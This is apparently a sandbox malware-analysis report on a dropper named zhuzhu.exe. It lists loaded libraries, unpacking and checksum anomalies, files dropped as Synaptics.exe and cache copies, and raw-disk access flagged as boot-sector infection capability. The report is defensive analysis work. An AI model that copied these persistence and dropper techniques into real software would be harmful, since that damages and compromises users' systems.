                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: napinsp.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: pnrpnsp.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wshbth.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: nlaapi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: winrnr.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dxgi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dinput8.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: inputhost.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: ntmarta.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: devenum.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: devobj.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msdmo.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: avicap32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msvfw32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: windowscodecs.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: avicap32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msvfw32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: firewallapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwbase.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpolicyiomgr.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netapi32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: secur32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasapi32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rasman.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: napinsp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: pnrpnsp.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wshbth.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: nlaapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winrnr.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: rtutils.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wbemcomn.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: amsi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windows.fileexplorer.common.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ntshrui.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cscapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: ntmarta.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: linkinfo.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: windowscodecs.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: textinputframework.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: coremessaging.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: dwrite.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: textshaping.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: cabinet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: msimg32.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: version.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\Downloads\inst.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\cmmNnpH.iniJump to behavior
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Users\user\Downloads\inst.exeWindow detected: Number of UI elements: 24
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                      Source: zhuzhu.exeStatic file information: File size 6061056 > 1048576
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                      Source: zhuzhu.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x51d400
                                      Source: Binary string: \Release\Code_Shellcode.pdb source: ._cache_zhuzhu.exe, ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 00000007.00000003.1803199164.0000000003C95000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp, 360P2SP.dll.7.dr
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 00000007.00000000.1759892249.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000000.1770278594.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr

                                      Data Obfuscation

                                      barindex
                                      Detected unpacking (overwrites its own PE header)
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeUnpacked PE file: 1.2.._cache_zhuzhu.exe.400000.0.unpack
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,1_2_10001170
                                      Source: ._cache_zhuzhu.exe.1.drStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                                      Source: ~$cache1.2.drStatic PE information: real checksum: 0x0 should be: 0xc1c51
                                      Source: zhuzhu.exeStatic PE information: real checksum: 0x0 should be: 0x5cd873
                                      Source: ._cache_zhuzhu.exe.0.drStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                                      Source: RCXE77E.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0xc1c51
                                      Source: Synaptics.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x5cd873
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F104 push cs; retf 2_2_09C8F15C
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F1A8 push ecx; ret 2_2_09C8F1A9
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F131 push cs; retf 2_2_09C8F15C
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03784345 push ecx; ret 4_2_03784358
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0379A168 push eax; ret 4_2_0379A119
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0379A0B8 push eax; ret 4_2_0379A119
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792470 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792450 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792438 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C7FE9A push ecx; ret 4_2_02C7FEBF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C69DF5 push ecx; ret 4_2_02C69E08
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCAFF push eax; retf 4_2_02BDCB00
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB0B push 701000CBh; retf 4_2_02BDCB10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB07 pushad ; retf 4_2_02BDCB08
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB61 pushfd ; retf 4_2_02BDCB64
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD9DCC push ecx; ret 4_2_02BD9DDF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03603D04 push ecx; ret 4_2_03603D17
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E4821 push ecx; ret 7_2_001E4834
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00177330 push ecx; mov dword ptr [esp], 00000000h7_2_00177331
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E54F9 push ecx; ret 7_2_001E550C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001639B0 push ecx; mov dword ptr [esp], 00000000h7_2_001639B1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00163C30 push ecx; mov dword ptr [esp], 00000000h7_2_00163C31
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52BD51 push ecx; ret 7_2_5F52BD64
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00178144 push dword ptr [ebp+ebp*8+3Bh]; ret 12_2_00178149
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E4821 push ecx; ret 12_2_001E4834
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00177330 push ecx; mov dword ptr [esp], 00000000h12_2_00177331
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E54F9 push ecx; ret 12_2_001E550C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001639B0 push ecx; mov dword ptr [esp], 00000000h12_2_001639B1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00163C30 push ecx; mov dword ptr [esp], 00000000h12_2_00163C31

                                      Persistence and Installation Behavior

                                      barindex
                                      Contains functionality to infect the boot sector
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d7_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d7_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D1BEB
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d7_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d7_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d12_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d12_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d12_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d12_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d12_2_001D1BEB
                                      Drops PE files to the document folder of the user
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\ProgramData\Synaptics\RCXE77E.tmpJump to dropped file
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exeJump to dropped file
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\Users\user\Desktop\._cache_zhuzhu.exeJump to dropped file
                                      Source: C:\Users\user\Downloads\inst.exeFile created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeFile created: C:\Users\user\Downloads\inst.exeJump to dropped file
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeFile created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeJump to dropped file
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                                      Source: C:\Users\user\Downloads\inst.exeFile created: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\ProgramData\Synaptics\RCXE77E.tmpJump to dropped file
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001CDA24 GetPrivateProfileStringW,7_2_001CDA24
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00199A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,7_2_00199A0C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F4FFE46 GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,GetPrivateProfileIntW,GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,_memset,_wcslen,_memset,inet_addr,inet_addr,_wcslen,__wcslwr,wsprintfW,7_2_5F4FFE46
